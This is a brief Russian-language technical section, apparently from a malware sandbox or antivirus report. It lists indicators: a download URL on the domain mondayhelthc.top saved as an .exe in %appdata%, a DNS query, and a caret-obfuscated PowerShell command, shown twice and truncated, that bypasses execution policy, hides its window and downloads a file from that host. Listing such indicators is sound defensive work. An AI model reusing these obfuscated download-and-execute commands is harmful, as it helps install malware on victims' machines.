Техническая информация
- http://mondayhelthc.top/read.php?f=404 как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^werSHelL^.^Exe -^e^XE^C^ut^Io^n^pOlicy^ Bypa^sS ^-nO^proF^i^lE -^WiNd^oW^sTyl^e HI^DDE^n ^(n^eW-^O^Bject sY^StE^m^.NE^T.^We^B^C^l^i^en^t)^.d^Own^LoadFiLe(^'http://mondayhelt...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /c "Po^werSHelL^.^Exe -^e^XE^C^ut^Io^n^pOlicy^ Bypa^sS ^-nO^proF^i^lE -^WiNd^oW^sTyl^e HI^DDE^n ^(n^eW-^O^Bject sY^StE^m^.NE^T.^We^B^C^l^i^en^t)^.d^Own^LoadFiLe(^'http://mondayhelt...' (со скрытым окном)